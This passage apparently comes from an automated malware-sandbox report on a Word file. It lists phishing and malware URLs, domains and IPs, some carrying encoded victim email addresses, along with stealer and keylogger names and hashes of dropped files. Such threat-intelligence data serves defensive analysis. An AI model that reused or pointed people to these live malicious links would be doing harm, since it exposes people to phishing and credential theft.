                                                                                  https://www.google.ch/url?sa=https://r20.rs6.net/tns.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/afrotech2023.com%2Fdhj%2F4298727249/bmljay5zcHVybG9ja0BsZWcud2EuZ292Get hashmaliciousUnknownBrowse
                                                                                    8DHbFKl94l.pdfGet hashmaliciousUnknownBrowse
                                                                                      151.101.130.137http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                      • code.jquery.com/jquery-1.11.3.min.js
                                                                                      http://imaps-support.us/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                      • code.jquery.com/jquery-1.11.3.min.js
                                                                                      http://facebooksecurity.blogspot.ch/Get hashmaliciousUnknownBrowse
                                                                                      • code.jquery.com/jquery-1.7.min.js
                                                                                      https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AING.shalominternationalministry.com/index.xml%23?email=amFtZXMubGVhZGJlYXRlckBsb2dpY2FsaXMuY29tGet hashmaliciousUnknownBrowse
                                                                                      • code.jquery.com/jquery-3.3.1.min.js
                                                                                      http://site9613885.92.webydo.com/?v=1Get hashmaliciousUnknownBrowse
                                                                                      • code.jquery.com/jquery-1.7.2.min.js
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      code.jquery.comhttp://portableapps.comGet hashmaliciousUnknownBrowse
                                                                                      • 151.101.194.137
                                                                                      Play_AUD__Aib_8973534156.htmlGet hashmaliciousUnknownBrowse
                                                                                      • 151.101.130.137
                                                                                      https://sewing-ladyltd.myshopify.com/sol?syclid=365862d9-5d6e-4a94-b401-31f50f547182Get hashmaliciousUnknownBrowse
                                                                                      • 151.101.2.137
                                                                                      NewVoicemail - +1 392 504 7XXX00-33Rebecca.silvaTranscript.htmlGet hashmaliciousUnknownBrowse
                                                                                      • 151.101.194.137
                                                                                      https://pxc.etemenonfor.com/lyKCxL5/#Ipoeschl@poeschl-tobacco.deGet hashmaliciousUnknownBrowse
                                                                                      • 151.101.2.137
                                                                                      https://www.google.es/url?q=queryrp18(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fpreview.adope.jp%2fod%2f8gqnmo6zgfuuc6sej4k7rfdswihr8l%2fZnJhbnMuZW5nZWxicmVjaHRAYXJkYWdoZ3JvdXAuY29t$?Get hashmaliciousUnknownBrowse
                                                                                      • 151.101.66.137
                                                                                      Request_for_Title_Commitment.htmlGet hashmaliciousUnknownBrowse
                                                                                      • 151.101.2.137
                                                                                      https://linklock.titanhq.com/analyse?url=https%3A%2F%2Fmyarrowleaf1-my.sharepoint.com%2F%3Af%3A%2Fg%2Fpersonal%2Fmarge_penrod_myarrowleaf_org%2FElQV40bjfBZKivPSKIPxGuYBa20TAVuQG9ya4YrQRKjHiQ%3Fe%3D7nML8f&data=eJxVzctugzAQBdCvMbtGBqOkWXhBlOYhUiW0VaR0gyZgGyL80Ng05e8L6aaVZlZz7p2Kz5PlPI1BxBQqFtW8qkF14P2ssjrSfEEPxukjHONsHXlusRboSUrN_aG0VA-IPFyxVU0QOB7_dfS8CcF5wjKSbMbRAyDaeydAxk96mPkGUDjbmjDxybBM_mo1rhv_WQPdlARUonTCoK3LPzWlxUm-dMU5pdebXH3m7dfpPd-fvrf9ZQUJ_cjOfbFdDpBesHjLb7u2IGwjCFsvzOvhWf4A0NhYxQ%25%25Get hashmaliciousUnknownBrowse
                                                                                      • 151.101.66.137
                                                                                      Request_for_Title_Commitment.htmlGet hashmaliciousUnknownBrowse
                                                                                      • 151.101.194.137
                                                                                      https://share.hsforms.com/13Dqwfz0LRkK1qoBQuRdgjgsnbj9Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 151.101.194.137
                                                                                      s3.eu-west-1.amazonaws.comhttps://hellpdesk.net/?r=36d3b0b3-f524-411f-8b98-ede0e545462e&rg=euGet hashmaliciousUnknownBrowse
                                                                                      • 52.92.19.144
                                                                                      cdnjs.cloudflare.comhttps://socialmedia-insights.bloemlight.com/XZTB1bnY3MDBCd0JJTUhGR0lPRHBsZEtuUVJIdkcvK0lLTGlHV1NNdldOYVNpc0xSR0lyRlJoZjBTMEFqNjUwYVlBeitmYVU0NHl6bFdXRzJKVmhENytORlF0SEZ5NVJaWFk4UisvSFVLTnM4WkJpcUk5UVpnblcwVERwWmVZazlma09qenhpeXNUOVM3eE12TU03ZjlCTTQrcGJPRXdRZlRVdXptM2dlVm12SnY0VjNVNGVpUHJycVlGbEQydz09LS1LVEpKanlxVmw0Zkdqc2FtLS0rVEVicDZaZnl6L3YwV2V5MVdzVmpRPT0=?cid=2274448099Get hashmaliciousKnowBe4Browse
                                                                                      • 104.17.25.14
                                                                                      https://onlinedropboxfile.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 104.17.24.14
                                                                                      Play_AUD__Aib_8973534156.htmlGet hashmaliciousUnknownBrowse
                                                                                      • 104.17.25.14
                                                                                      FiddlerSetup.5.0.20245.10105-latest.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                      • 104.17.25.14
                                                                                      https://sewing-ladyltd.myshopify.com/sol?syclid=365862d9-5d6e-4a94-b401-31f50f547182Get hashmaliciousUnknownBrowse
                                                                                      • 104.17.24.14
                                                                                      ProtectedDoc.docxGet hashmaliciousKnowBe4Browse
                                                                                      • 104.17.25.14
                                                                                      ProtectedDoc.docxGet hashmaliciousKnowBe4Browse
                                                                                      • 104.17.25.14
                                                                                      https://www.photogallerybd.com/n/?c3Y9bzM2NV8xX29uZSZyYW5kPWMydFJkbWs9JnVpZD1VU0VSMjgxMDIwMjRVMjQxMDI4NTQ=N0123NGet hashmaliciousMamba2FABrowse
                                                                                      • 104.17.24.14
                                                                                      https://tenereteam.digidip.net/visit?url=https%3A%2F%2Fzp73eW7jfL3crnrfCoQ60D1yS.adpk.com.br/xQwrPPjghfe/viWyugvQwer/bvdfreGhjik/saQriuhbT/SWn28u/ZnVjay55b3VAd2hhdGV2ZXIuY29tGet hashmaliciousUnknownBrowse
                                                                                      • 104.17.24.14
                                                                                      doc_Agilitas_9769667025.htmlGet hashmaliciousPhisherBrowse
                                                                                      • 104.17.24.14
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      TRUSTNET-PL-ASPL4XQ5CxjWnW.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 91.211.222.192
                                                                                      1tCwYQCFhP.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 91.211.222.192
                                                                                      doc023571961504.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                      • 91.211.221.78
                                                                                      SecuriteInfo.com.PowerShell.Siggen.2046.5121.22247.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                      • 91.211.221.78
                                                                                      SecuriteInfo.com.Win32.RansomX-gen.4067.126.exeGet hashmaliciousLummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, RedLine, SmokeLoaderBrowse
                                                                                      • 91.211.222.158
                                                                                      https://kancelariadabek.pl/components/com_content/team/?email=am9obkB0cm4uY29tGet hashmaliciousReCaptcha PhishBrowse
                                                                                      • 91.211.221.18
                                                                                      Justificante de Transferencia.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                      • 91.211.220.248
                                                                                      Facturas Pagadas al Vencimiento.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                      • 91.211.220.248
                                                                                      SecuriteInfo.com.Variant.Tedy.200463.8682.12520.exeGet hashmaliciousCryptOne, RedLineBrowse
                                                                                      • 91.211.222.69
                                                                                      QTFsui5pLN.xlsmGet hashmaliciousUnknownBrowse
                                                                                      • 91.211.222.226
                                                                                      FASTLYUShttps://mail.outlook-365.com/0fslgu3q29ktmq2dGet hashmaliciousUnknownBrowse
                                                                                      • 151.101.128.84
                                                                                      http://portableapps.comGet hashmaliciousUnknownBrowse
                                                                                      • 151.101.194.137
                                                                                      https://socialmedia-insights.bloemlight.com/XZTB1bnY3MDBCd0JJTUhGR0lPRHBsZEtuUVJIdkcvK0lLTGlHV1NNdldOYVNpc0xSR0lyRlJoZjBTMEFqNjUwYVlBeitmYVU0NHl6bFdXRzJKVmhENytORlF0SEZ5NVJaWFk4UisvSFVLTnM4WkJpcUk5UVpnblcwVERwWmVZazlma09qenhpeXNUOVM3eE12TU03ZjlCTTQrcGJPRXdRZlRVdXptM2dlVm12SnY0VjNVNGVpUHJycVlGbEQydz09LS1LVEpKanlxVmw0Zkdqc2FtLS0rVEVicDZaZnl6L3YwV2V5MVdzVmpRPT0=?cid=2274448099Get hashmaliciousKnowBe4Browse
                                                                                      • 199.232.196.193
                                                                                      Play_AUD__Aib_8973534156.htmlGet hashmaliciousUnknownBrowse
                                                                                      • 151.101.66.137
                                                                                      https://sewing-ladyltd.myshopify.com/sol?syclid=365862d9-5d6e-4a94-b401-31f50f547182Get hashmaliciousUnknownBrowse
                                                                                      • 151.101.2.137
                                                                                      ProtectedDoc.docxGet hashmaliciousKnowBe4Browse
                                                                                      • 199.232.192.193
                                                                                      ProtectedDoc.docxGet hashmaliciousKnowBe4Browse
                                                                                      • 199.232.196.193
                                                                                      http://deepai.orgGet hashmaliciousLiteHTTP BotBrowse
                                                                                      • 151.101.129.21
                                                                                      Tjones-In Service Agreement-817744.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 151.101.130.137
                                                                                      https://brand.page/N0www1904Get hashmaliciousUnknownBrowse
                                                                                      • 151.101.1.229
                                                                                      EKSENBILISIMTRhttps://linklock.titanhq.com/analyse?url=https%3A%2F%2Fmyarrowleaf1-my.sharepoint.com%2F%3Af%3A%2Fg%2Fpersonal%2Fmarge_penrod_myarrowleaf_org%2FElQV40bjfBZKivPSKIPxGuYBa20TAVuQG9ya4YrQRKjHiQ%3Fe%3D7nML8f&data=eJxVzctugzAQBdCvMbtGBqOkWXhBlOYhUiW0VaR0gyZgGyL80Ng05e8L6aaVZlZz7p2Kz5PlPI1BxBQqFtW8qkF14P2ssjrSfEEPxukjHONsHXlusRboSUrN_aG0VA-IPFyxVU0QOB7_dfS8CcF5wjKSbMbRAyDaeydAxk96mPkGUDjbmjDxybBM_mo1rhv_WQPdlARUonTCoK3LPzWlxUm-dMU5pdebXH3m7dfpPd-fvrf9ZQUJ_cjOfbFdDpBesHjLb7u2IGwjCFsvzOvhWf4A0NhYxQ%25%25Get hashmaliciousUnknownBrowse
                                                                                      • 147.79.74.176
                                                                                      scan3762399_arleen@wcctxlaw.com.pdfGet hashmaliciousUnknownBrowse
                                                                                      • 147.79.74.176
                                                                                      QeTCfhacvf.exeGet hashmaliciousOrcusBrowse
                                                                                      • 45.10.151.182
                                                                                      ACTION REQUIRED Revised Billing #NL992-071 From Robinson Aviation Inc.msgGet hashmaliciousUnknownBrowse
                                                                                      • 147.79.74.176
                                                                                      xxTupY4Fr3.xlsxGet hashmaliciousUnknownBrowse
                                                                                      • 147.79.119.141
                                                                                      https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0Get hashmaliciousUnknownBrowse
                                                                                      • 147.79.74.176
                                                                                      https://pub-535a4999ab4b4c1e81647bad9b888e40.r2.dev/onedrivefresh.htmlGet hashmaliciousUnknownBrowse
                                                                                      • 147.79.74.176
                                                                                      https://merzcon-my.sharepoint.com/:f:/g/personal/cnico_merzcon_onmicrosoft_com/EmjHG5K9dP9BtgBBeTTFhjABJRRLGM6IhVrJlwBTMWY8rg?e=pfkS1fGet hashmaliciousUnknownBrowse
                                                                                      • 147.79.74.176
                                                                                      https://netorg11230081-my.sharepoint.com/:f:/g/personal/info_onafastpacecontracting_com/Eoa77Lo8BXlOut3qDNQUDAQBBgmgCvIALxhAXrlqjk9Asw?e=2UKAY6Get hashmaliciousUnknownBrowse
                                                                                      • 147.79.74.176
                                                                                      Ziraat Bankasi Swift Mesaji_20241003_3999382.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 45.143.99.52
                                                                                      CLOUDFLARENETUSphish_alert_sp2_2.0.0.0-1.emlGet hashmaliciousUnknownBrowse
                                                                                      • 172.64.41.3
                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • 104.21.80.55
                                                                                      https://mail.outlook-365.com/0fslgu3q29ktmq2dGet hashmaliciousUnknownBrowse
                                                                                      • 1.1.1.1
                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.174.133
                                                                                      QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                      • 188.114.96.3
                                                                                      QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                      • 188.114.96.3
                                                                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.96.3
                                                                                      DfEohEn32q.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.184.208
                                                                                      http://portableapps.comGet hashmaliciousUnknownBrowse
                                                                                      • 172.64.145.29
                                                                                      https://socialmedia-insights.bloemlight.com/XZTB1bnY3MDBCd0JJTUhGR0lPRHBsZEtuUVJIdkcvK0lLTGlHV1NNdldOYVNpc0xSR0lyRlJoZjBTMEFqNjUwYVlBeitmYVU0NHl6bFdXRzJKVmhENytORlF0SEZ5NVJaWFk4UisvSFVLTnM4WkJpcUk5UVpnblcwVERwWmVZazlma09qenhpeXNUOVM3eE12TU03ZjlCTTQrcGJPRXdRZlRVdXptM2dlVm12SnY0VjNVNGVpUHJycVlGbEQydz09LS1LVEpKanlxVmw0Zkdqc2FtLS0rVEVicDZaZnl6L3YwV2V5MVdzVmpRPT0=?cid=2274448099Get hashmaliciousKnowBe4Browse
                                                                                      • 104.17.25.14
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      28a2c9bd18a11de089ef85a160da29e4https://ntx.redblocks.io/Get hashmaliciousUnknownBrowse
                                                                                      • 52.149.20.212
                                                                                      Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                      • 52.149.20.212
                                                                                      New order.xlsGet hashmaliciousUnknownBrowse
                                                                                      • 52.149.20.212
                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                      • 52.149.20.212
                                                                                      https://url.uk.m.mimecastprotect.com/s/qCW9CoOQ8clw4LF1fOHpzLEI?domain=url.us.m.mimecastprotect.comGet hashmaliciousUnknownBrowse
                                                                                      • 52.149.20.212
                                                                                      purchase order (2).xlsGet hashmaliciousUnknownBrowse
                                                                                      • 52.149.20.212
                                                                                      http://portableapps.comGet hashmaliciousUnknownBrowse
                                                                                      • 52.149.20.212
                                                                                      https://socialmedia-insights.bloemlight.com/XZTB1bnY3MDBCd0JJTUhGR0lPRHBsZEtuUVJIdkcvK0lLTGlHV1NNdldOYVNpc0xSR0lyRlJoZjBTMEFqNjUwYVlBeitmYVU0NHl6bFdXRzJKVmhENytORlF0SEZ5NVJaWFk4UisvSFVLTnM4WkJpcUk5UVpnblcwVERwWmVZazlma09qenhpeXNUOVM3eE12TU03ZjlCTTQrcGJPRXdRZlRVdXptM2dlVm12SnY0VjNVNGVpUHJycVlGbEQydz09LS1LVEpKanlxVmw0Zkdqc2FtLS0rVEVicDZaZnl6L3YwV2V5MVdzVmpRPT0=?cid=2274448099Get hashmaliciousKnowBe4Browse
                                                                                      • 52.149.20.212
                                                                                      http://pto.bicepheady.com/Get hashmaliciousUnknownBrowse
                                                                                      • 52.149.20.212
                                                                                      https://url11.kmt4ispayroll.com/?id=eyJlbWFpbF9pZCI6ImRnVER4d2NEQVAyTURfeU1Ed0dUSlVtb194VC0xeUp6Wk-t3aldrdz0iLCJocmVmIjoiaHR0cHM6Ly90Lm1lL3N0YWN5X215YnJvY2FyZCIs-ImludGVybmFsIjoiYzNjNzA3MDhmYzM5ZmQ4YzBmIiwibGlua19pZCI6ODY4fQ-e06f9243688f8d3f6986ffbedf3a11c620bbea820e86e17c3fd3a4979cbc3e26AOMMRkVTE4y4i4MhR8PO5Li1enwscIrfMMFkF0FdObryKs8IHKZe9lNXxCYBGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                      • 52.149.20.212
                                                                                      No context
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):521377
                                                                                      Entropy (8bit):4.9084889265453135
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
                                                                                      MD5:C37972CBD8748E2CA6DA205839B16444
                                                                                      SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
                                                                                      SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
                                                                                      SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
                                                                                      Category:dropped
                                                                                      Size (bytes):773040
                                                                                      Entropy (8bit):6.55939673749297
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
                                                                                      MD5:4296A064B917926682E7EED650D4A745
                                                                                      SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
                                                                                      SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
                                                                                      SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:........... OS/29....(...`cmap.s.,.......pglyf..&....|....head2..........6hheaE.@v.......$hmtx...........@loca.U.....8...Dmaxp........... name.P+........post...<...... .........b~1_.<...........<......r......Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................k......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):0.03351732319703582
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ol3lG:40
                                                                                      MD5:830FBF83999E052538EAF156AB6ECB17
                                                                                      SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                                                      SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                                                      SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):0.03351732319703582
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ol3lG:40
                                                                                      MD5:830FBF83999E052538EAF156AB6ECB17
                                                                                      SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                                                      SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                                                      SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):0.03351732319703582
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ol3lG:40
                                                                                      MD5:830FBF83999E052538EAF156AB6ECB17
                                                                                      SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                                                      SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                                                      SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):0.2491520368908127
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:YlXl3lldHzlblXllZrnlPlK:I4
                                                                                      MD5:9A5F3325C368A02FABF00EC854202D3F
                                                                                      SHA1:B423BAB6D74354C6705C813CE0246BA432D1BBF9
                                                                                      SHA-256:759AD91E909277C421B0062454FDC8D9845FA506B64F8BF0341C2BBC3A9D4856
                                                                                      SHA-512:7402FC0BCD09CB2A2F12D4B138ECD1C3DFF255DA9F11EFDEE640BEFB834A4F49F3884A1BFF0E84CB822349EF7E129AEDD77D58070A87AAD1EC2F96AA31B9EA64
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):0.03351732319703582
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ol3lG:40
                                                                                      MD5:830FBF83999E052538EAF156AB6ECB17
                                                                                      SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                                                      SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                                                      SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):0.03351732319703582
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ol3lG:40
                                                                                      MD5:830FBF83999E052538EAF156AB6ECB17
                                                                                      SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                                                      SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                                                      SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):0.03351732319703582
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ol3lG:40
                                                                                      MD5:830FBF83999E052538EAF156AB6ECB17
                                                                                      SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                                                      SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                                                      SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):0.03351732319703582
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ol3lG:40
                                                                                      MD5:830FBF83999E052538EAF156AB6ECB17
                                                                                      SHA1:9F6C69FA4232801D3A4857C630BA7A719662135A
                                                                                      SHA-256:D5098A2CEAE815DB29CD53C76F85240C95DC4D2E3FEDDD71D628617064C29869
                                                                                      SHA-512:A83E2E9D5274F0065A26C306F355E9590D6126297EAD87AF053CC78FB64CB31694C533139F72686C77FC772148181D8AAE973E65978D04E5F20F6F6C6BA0A013
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):0.03351732319703582
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ol3lG:40
                                                                                      MD5:830FBF83999E052538EAF156AB6ECB17
